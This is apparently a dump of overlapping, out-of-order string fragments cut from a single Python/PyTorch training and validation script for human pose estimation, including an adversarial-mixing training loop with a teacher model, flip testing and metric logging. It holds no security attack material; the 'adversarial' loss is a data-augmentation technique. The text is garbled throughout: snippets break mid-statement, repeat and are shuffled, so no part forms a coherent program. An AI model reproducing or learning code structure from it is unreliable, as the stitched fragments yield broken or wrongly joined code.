perf_indicator = val_dataset.evaluate( config,", "to evaluate mode model.eval() num_samples = len(val_dataset) all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3),", "target, target_weight) num_images = input.size(0) # measure accuracy and record loss losses.update(loss.item(), num_images)", "measure accuracy and record loss losses.update(loss.item(), num_images) _, avg_acc, cnt, pred = accuracy(output,", "flipped heatmap for higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :, 1:] = \\", "= -criterion(output, target, target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure accuracy and record", "c[:, 0:2] all_boxes[idx:idx + num_images, 2:4] = s[:, 0:2] all_boxes[idx:idx + num_images, 4]", "= writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps ) writer.add_scalar( 'valid_acc', acc.avg, global_steps ) if", "'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss", "full_arch_name): names = name_value.keys() values = name_value.values() num_values = len(name_value) logger.info( '| Arch", "output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter() losses = AverageMeter() acc", "c, s) all_preds[idx:idx + num_images, :, 0:2] = preds[:, :, 0:2] all_preds[idx:idx +", "accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :, 1:] = \\ output_flipped.clone()[:, :, :, 0:-1]", "args, train_loader, models, criterion, optimizers, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time", "def validate(config, args, val_loader, val_dataset, model, criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time =", "= (output + output_flipped) * 0.5 if not cpu: target = target[0].cuda(non_blocking=True) target_hm", "* 0.5 if not cpu: target = target[0].cuda(non_blocking=True) target_hm = target target_weight =", "writer.add_scalar( 'valid_acc', acc.avg, global_steps ) if isinstance(name_values, list): for name_value in name_values: writer.add_scalars(", "= [_.cuda(non_blocking=True) for _ in inputs] target = targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta", "values = name_value.values() num_values = len(name_value) logger.info( '| Arch ' + ' '.join(['|", "full_arch_name[:8] + '...' logger.info( '| ' + full_arch_name + ' ' + '", "' + full_arch_name + ' ' + ' '.join(['| {:.3f}'.format(value) for value in", "+ ' '.join(['| {:.3f}'.format(value) for value in values]) + ' |' ) class", "self.val = val self.sum += val * n self.count += n self.avg =", "time is :', time_gpu / len(val_loader)) name_values, perf_indicator = val_dataset.evaluate( config, all_preds, output_dir,", "from __future__ import print_function import time import logging import os, copy import numpy", "s = meta['scale'].numpy() score = meta['score'].numpy() preds, maxvals = get_final_preds( config, args, output.clone().cpu().numpy(),", "logging import os, copy import numpy as np import torch from core.evaluate import", "cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if", "pred*4, outputs, prefix) def validate(config, args, val_loader, val_dataset, model, criterion, output_dir, tb_log_dir, writer_dict=None,", "({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses,", "* n self.count += n self.avg = self.sum / self.count if self.count !=", "import os, copy import numpy as np import torch from core.evaluate import accuracy", "target, target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs = model(input) target =", "acc = AverageMeter() # switch to evaluate mode model.eval() num_samples = len(val_dataset) all_preds", "- infer_start) if isinstance(outputs, list): output = outputs[-1] else: output = outputs if", "= flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy())", "[{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format(", "accuracy(output, target, args=None, cfg=config) output = _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end", "{batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f}", "val_loader, val_dataset, model, criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time = AverageMeter() losses =", "(num_values+1) + '|') if len(full_arch_name) > 15: full_arch_name = full_arch_name[:8] + '...' logger.info(", "(c) Microsoft # Licensed under the MIT License. # Written by <NAME> (<EMAIL>)", "0:2] = c[:, 0:2] all_boxes[idx:idx + num_images, 2:4] = s[:, 0:2] all_boxes[idx:idx +", "accuracy and record loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt, pred = accuracy(output, target,", "({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix =", "'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer", "list): model = model[0].train() model_D = model[1].train() else: model.train() end = time.time() for", "nn from tqdm import tqdm import torch.nn.functional as F logger = logging.getLogger(__name__) def", "meta['model_supervise_channel'] > 0.5 if isinstance(inputs, list): inputs = [_.cuda(non_blocking=True) for _ in inputs]", "inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1, len(inputs)): tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1)", "c = meta['center'].numpy() s = meta['scale'].numpy() score = meta['score'].numpy() preds, maxvals = get_final_preds(", "logger.info( '| Arch ' + ' '.join(['| {}'.format(name) for name in names]) +", "config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :, 1:] = \\ output_flipped.clone()[:, :, :, 0:-1] output =", "range(1, len(inputs)): tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with torch.no_grad(): teacher_output", "all_preds[idx:idx + num_images, :, 2:3] = maxvals # double check this all_boxes parts", "batch_time = AverageMeter() data_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() if", "\"\"\"Computes and stores the average and current value\"\"\" def __init__(self): self.reset() def reset(self):", "0 self.count = 0 def update(self, val, n=1): self.val = val self.sum +=", "meta) in tqdm(enumerate(val_loader)): if not cpu: input = input.cuda() # compute output torch.cuda.synchronize()", "in range(1, len(inputs)): tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with torch.no_grad():", "in name_values: writer.add_scalars( 'valid', dict(name_value), global_steps ) else: writer.add_scalars( 'valid', dict(name_values), global_steps )", "= model(input) infer_end = time.time() torch.cuda.synchronize() time_gpu += (infer_end - infer_start) if isinstance(outputs,", "= val_dataset.evaluate( config, all_preds, output_dir, all_boxes, image_path, filenames, imgnums ) model_name = config.MODEL.NAME", "({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time,", "output def _print_name_value(name_value, full_arch_name): names = name_value.keys() values = name_value.values() num_values = len(name_value)", "0. for i, (input, target, target_weight, meta) in tqdm(enumerate(val_loader)): if not cpu: input", "prefix + '_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs, prefix) def validate(config, args,", "batch_time.update(time.time() - end) end = time.time() # corresponding center scale joint c =", "list_index in range(1, len(inputs)): tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with", "name_values, perf_indicator = val_dataset.evaluate( config, all_preds, output_dir, all_boxes, image_path, filenames, imgnums ) model_name", "= model(input) target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss =", "and do update step optimizer.zero_grad() loss.backward() optimizer.step() # measure accuracy and record loss", "= inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1, len(inputs)): tmp += inputs[list_index] *", "model(tmp) output = outputs loss_G = -criterion(output, target, target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step()", "target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(outputs, target,", "= target_weight.cuda(non_blocking=True) loss = criterion(outputs, target, target_weight) # compute gradient and do update", "outputs[-1] else: output = outputs if config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped = model(input_flipped)", "check this all_boxes parts all_boxes[idx:idx + num_images, 0:2] = c[:, 0:2] all_boxes[idx:idx +", "+= num_images if i % config.PRINT_FREQ == 0: msg = 'Test: [{0}/{1}]\\t' \\", "{batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time,", "= get_final_preds( config, args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx + num_images, :, 0:2] =", "'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg)", ":, 2:3] = maxvals # double check this all_boxes parts all_boxes[idx:idx + num_images,", "= AverageMeter() if isinstance(model, list): model = model[0].train() model_D = model[1].train() else: model.train()", "for net in nets: if net is not None: for param in net.parameters():", "imgnums ) model_name = config.MODEL.NAME if isinstance(name_values, list): for name_value in name_values: _print_name_value(name_value,", "= AverageMeter() acc = AverageMeter() # switch to evaluate mode model.eval() num_samples =", "target_weight, meta) in tqdm(enumerate(val_loader)): if not cpu: input = input.cuda() # compute output", "i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps =", "target, args=None, cfg=config) output = _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end =", "writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps ) writer.add_scalar( 'valid_acc', acc.avg, global_steps", "<NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from __future__ import absolute_import from __future__ import division from", "# markdown format output def _print_name_value(name_value, full_arch_name): names = name_value.keys() values = name_value.values()", "SoftArgmax2D from utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda from utils.vis import", "scale joint c = meta['center'].numpy() s = meta['scale'].numpy() score = meta['score'].numpy() preds, maxvals", "aligned, shift flipped heatmap for higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :, 1:]", "\\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val,", "perf_indicator # markdown format output def _print_name_value(name_value, full_arch_name): names = name_value.keys() values =", "'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s", "compute gradient and do update step set_require_grad(model, False) optimizer_G.zero_grad() outputs = model(tmp) output", "n self.count += n self.avg = self.sum / self.count if self.count != 0", "end = time.time() for i, (inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() -", "batch_time.update(time.time() - end) end = time.time() if i % config.PRINT_FREQ == 0: msg", "target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs = model(input) target = target[0].cuda(non_blocking=True)", "{data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader),", "targets, target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) # mask_channel = meta['model_supervise_channel'] >", "for name in names]) + ' |' ) logger.info('|---' * (num_values+1) + '|')", "all_boxes[idx:idx + num_images, 4] = np.prod(s*200, 1) all_boxes[idx:idx + num_images, 5] = score", "# compute gradient and do update step optimizer.zero_grad() loss.backward() optimizer.step() # measure accuracy", "optimizer, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter() losses =", "# ------------------------------------------------------------------------------ from __future__ import absolute_import from __future__ import division from __future__ import", "i % config.PRINT_FREQ == 0: msg = 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t'", "names]) + ' |' ) logger.info('|---' * (num_values+1) + '|') if len(full_arch_name) >", "target, pred*4, outputs, prefix) def validate(config, args, val_loader, val_dataset, model, criterion, output_dir, tb_log_dir,", "train(config, args, train_loader, model, criterion, optimizer, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter()", "isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1] else: output_flipped = outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs)", "target_weight = target_weight.cuda(non_blocking=True) loss = criterion(output, target, target_weight) num_images = input.size(0) # measure", "in values]) + ' |' ) class AverageMeter(object): \"\"\"Computes and stores the average", "if i % config.PRINT_FREQ == 0: msg = 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s", "= models[1].train() model_teacher = models[2].eval() else: models.train() optimizer = optimizers[0] optimizer_G = optimizers[1]", "= 0 self.count = 0 def update(self, val, n=1): self.val = val self.sum", "set_require_grad(model, True) optimizer.zero_grad() tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1, len(inputs)):", "else: output_flipped = outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu: output_flipped =", "inputs = inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model, True)", "({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir, 'val'), i", "for name_value in name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name) if writer_dict: writer =", "isinstance(name_values, list): for name_value in name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name) if writer_dict:", "model_name) if writer_dict: writer = writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps", "outputs, prefix + '_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs, prefix) def validate(config,", "0:2] = preds[:, :, 0:2] all_preds[idx:idx + num_images, :, 2:3] = maxvals #", "accuracy(output, target, args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if", ") logger.info('|---' * (num_values+1) + '|') if len(full_arch_name) > 15: full_arch_name = full_arch_name[:8]", "+ num_images, 0:2] = c[:, 0:2] all_boxes[idx:idx + num_images, 2:4] = s[:, 0:2]", "writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] = global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i)", "is not None: for param in net.parameters(): param.requires_grad = requires_grad def train_advmix(config, args,", "num_images) _, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) output = _tocuda(output)", "global_steps ) writer_dict['valid_global_steps'] = global_steps + 1 return name_values, perf_indicator # markdown format", "import torch.nn.functional as F logger = logging.getLogger(__name__) def train(config, args, train_loader, model, criterion,", "perf_indicator = val_dataset.evaluate( config, all_preds, output_dir, all_boxes, image_path, filenames, imgnums ) model_name =", "- end) outputs = model(input) target = target[0].cuda(non_blocking=True) target_hm = target target_weight =", "optimizers[1] end = time.time() for i, (inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time()", "global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] = global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'),", "= val self.sum += val * n self.count += n self.avg = self.sum", "_tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() # corresponding center scale", "loss_D_hm * (1 - args.alpha) + loss_D_kd * args.alpha loss_D.backward() optimizer.step() # G:", "global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps ) writer.add_scalar( 'valid_acc', acc.avg, global_steps )", "= metas[0] else: inputs = inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input),", "loss_G = -criterion(output, target, target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure accuracy and", "* args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure accuracy and record loss losses.update(loss_D.item(), inputs[0].size(0)) _,", "global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] = global_steps +", "mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1, len(inputs)): tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach =", "prefix = '{}_{}'.format( os.path.join(output_dir, 'val'), i ) save_debug_images(config, input, meta, target_hm, pred *", "models, criterion, optimizers, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter()", "Microsoft # Licensed under the MIT License. # Written by <NAME> (<EMAIL>) #", "name_value in name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name) if writer_dict: writer = writer_dict['writer']", "cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy()) # feature is not aligned,", "_, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() -", "+ '...' logger.info( '| ' + full_arch_name + ' ' + ' '.join(['|", "num_images, 2:4] = s[:, 0:2] all_boxes[idx:idx + num_images, 4] = np.prod(s*200, 1) all_boxes[idx:idx", "{speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f}", "[{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t'", "pred*4, outputs, prefix) def set_require_grad(nets, requires_grad=True): if not isinstance(nets, list): nets = [nets]", "= torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy()) # feature is not aligned, shift flipped", "for higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :, 1:] = \\ output_flipped.clone()[:, :,", "isinstance(nets, list): nets = [nets] for net in nets: if net is not", "- end) end = time.time() if i % config.PRINT_FREQ == 0: msg =", "end = time.time() for i, (input, target, target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() -", "if isinstance(models, list): model = models[0].train() model_G = models[1].train() model_teacher = models[2].eval() else:", "criterion, optimizer, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter() losses", "= np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes = np.zeros((num_samples, 6)) image_path =", "outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped", "np import torch from core.evaluate import accuracy from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D", "target_weight) # compute gradient and do update step optimizer.zero_grad() loss.backward() optimizer.step() # measure", "global_steps + 1 return name_values, perf_indicator # markdown format output def _print_name_value(name_value, full_arch_name):", "time_gpu / len(val_loader)) name_values, perf_indicator = val_dataset.evaluate( config, all_preds, output_dir, all_boxes, image_path, filenames,", "= torch.from_numpy(output_flipped.copy()) # feature is not aligned, shift flipped heatmap for higher accuracy", "gradient and do update step set_require_grad(model, False) optimizer_G.zero_grad() outputs = model(tmp) output =", "list): nets = [nets] for net in nets: if net is not None:", "Copyright (c) Microsoft # Licensed under the MIT License. # Written by <NAME>", "get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda from", "= time.time() outputs = model(input) infer_end = time.time() torch.cuda.synchronize() time_gpu += (infer_end -", "image_path = [] filenames = [] imgnums = [] idx = 0 feat_dict", "value in values]) + ' |' ) class AverageMeter(object): \"\"\"Computes and stores the", "writer_dict): batch_time = AverageMeter() data_time = AverageMeter() losses = AverageMeter() acc = AverageMeter()", "param in net.parameters(): param.requires_grad = requires_grad def train_advmix(config, args, train_loader, models, criterion, optimizers,", "len(full_arch_name) > 15: full_arch_name = full_arch_name[:8] + '...' logger.info( '| ' + full_arch_name", "loss=losses, acc=acc) logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir, 'val'), i ) save_debug_images(config, input, meta,", "------------------------------------------------------------------------------ from __future__ import absolute_import from __future__ import division from __future__ import print_function", "= input.cuda() # compute output torch.cuda.synchronize() infer_start = time.time() outputs = model(input) infer_end", "= accuracy(output, target, args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time()", "# Written by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from __future__ import absolute_import from __future__", "import tqdm import torch.nn.functional as F logger = logging.getLogger(__name__) def train(config, args, train_loader,", "from utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda from utils.vis import save_debug_images", "samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format(", "if isinstance(name_values, list): for name_value in name_values: writer.add_scalars( 'valid', dict(name_value), global_steps ) else:", "not None: for param in net.parameters(): param.requires_grad = requires_grad def train_advmix(config, args, train_loader,", "data_time.update(time.time() - end) outputs = model(input) target = target[0].cuda(non_blocking=True) target_hm = target target_weight", "= full_arch_name[:8] + '...' logger.info( '| ' + full_arch_name + ' ' +", "global_steps ) if isinstance(name_values, list): for name_value in name_values: writer.add_scalars( 'valid', dict(name_value), global_steps", "acc.val, global_steps) writer_dict['train_global_steps'] = global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config,", "cpu: target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(output,", "this all_boxes parts all_boxes[idx:idx + num_images, 0:2] = c[:, 0:2] all_boxes[idx:idx + num_images,", "import save_debug_images import torch.nn as nn from tqdm import tqdm import torch.nn.functional as", "feature is not aligned, shift flipped heatmap for higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:,", "batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir, 'val'), i ) save_debug_images(config, input,", "+ num_images, :, 2:3] = maxvals # double check this all_boxes parts all_boxes[idx:idx", "' |' ) logger.info('|---' * (num_values+1) + '|') if len(full_arch_name) > 15: full_arch_name", "= time.time() # corresponding center scale joint c = meta['center'].numpy() s = meta['scale'].numpy()", "filenames, imgnums ) model_name = config.MODEL.NAME if isinstance(name_values, list): for name_value in name_values:", "+ ' '.join(['| {}'.format(name) for name in names]) + ' |' ) logger.info('|---'", "with torch.no_grad(): end = time.time() time_gpu = 0. for i, (input, target, target_weight,", "save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs, prefix + '_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target,", "args, val_loader, val_dataset, model, criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time = AverageMeter() losses", "self.count += n self.avg = self.sum / self.count if self.count != 0 else", "== 0: msg = 'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f}", "idx += num_images if i % config.PRINT_FREQ == 0: msg = 'Test: [{0}/{1}]\\t'", "* mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach,", "reset(self): self.val = 0 self.avg = 0 self.sum = 0 self.count = 0", "loss_D = loss_D_hm * (1 - args.alpha) + loss_D_kd * args.alpha loss_D.backward() optimizer.step()", "= 0. for i, (input, target, target_weight, meta) in tqdm(enumerate(val_loader)): if not cpu:", "_, avg_acc, cnt, pred = accuracy(outputs, target, args=None, cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc,", "meta, target_hm, pred*4, outputs, prefix) def set_require_grad(nets, requires_grad=True): if not isinstance(nets, list): nets", "global_steps) writer_dict['train_global_steps'] = global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0],", "i) save_debug_images(config, input, meta, target_hm, pred*4, outputs, prefix) def set_require_grad(nets, requires_grad=True): if not", "net.parameters(): param.requires_grad = requires_grad def train_advmix(config, args, train_loader, models, criterion, optimizers, epoch, output_dir,", "config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes = np.zeros((num_samples, 6)) image_path = [] filenames =", "({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer']", "' ' + ' '.join(['| {:.3f}'.format(value) for value in values]) + ' |'", "teacher_output, target_weight) loss_D = loss_D_hm * (1 - args.alpha) + loss_D_kd * args.alpha", "-criterion(output, target, target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure accuracy and record loss", "time import logging import os, copy import numpy as np import torch from", "= '{}_{}'.format( os.path.join(output_dir, 'val'), i ) save_debug_images(config, input, meta, target_hm, pred * 4,", "+ num_images, 5] = score image_path.extend(meta['image']) idx += num_images if i % config.PRINT_FREQ", "= model(tmp.detach()) with torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target, target_weight) loss_D_kd", "import division from __future__ import print_function import time import logging import os, copy", "% config.PRINT_FREQ == 0: msg = 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\", "# Licensed under the MIT License. # Written by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------", "meta['scale'].numpy() score = meta['score'].numpy() preds, maxvals = get_final_preds( config, args, output.clone().cpu().numpy(), c, s)", "target_weight.cuda(non_blocking=True) loss = criterion(outputs, target, target_weight) # compute gradient and do update step", "losses = AverageMeter() acc = AverageMeter() if isinstance(model, list): model = model[0].train() model_D", "({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc)", "import torch.nn as nn from tqdm import tqdm import torch.nn.functional as F logger", "isinstance(models, list): model = models[0].train() model_G = models[1].train() model_teacher = models[2].eval() else: models.train()", "loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) acc.update(avg_acc,", "pred*4, outputs, prefix + '_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs, prefix) def", "= writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps ) writer.add_scalar( 'valid_acc', acc.avg,", "if not cpu: input = input.cuda() # compute output torch.cuda.synchronize() infer_start = time.time()", "val * n self.count += n self.avg = self.sum / self.count if self.count", "'valid_loss', losses.avg, global_steps ) writer.add_scalar( 'valid_acc', acc.avg, global_steps ) if isinstance(name_values, list): for", "target_weight.cuda(non_blocking=True) loss = criterion(output, target, target_weight) num_images = input.size(0) # measure accuracy and", "torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp = inputs[0] *", "val_dataset, model, criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time = AverageMeter() losses = AverageMeter()", "np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes = np.zeros((num_samples, 6)) image_path = []", "outputs if config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped = model(input_flipped) if isinstance(outputs_flipped, list): output_flipped", "import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda", "outputs = model(input) infer_end = time.time() torch.cuda.synchronize() time_gpu += (infer_end - infer_start) if", "= len(name_value) logger.info( '| Arch ' + ' '.join(['| {}'.format(name) for name in", "class AverageMeter(object): \"\"\"Computes and stores the average and current value\"\"\" def __init__(self): self.reset()", 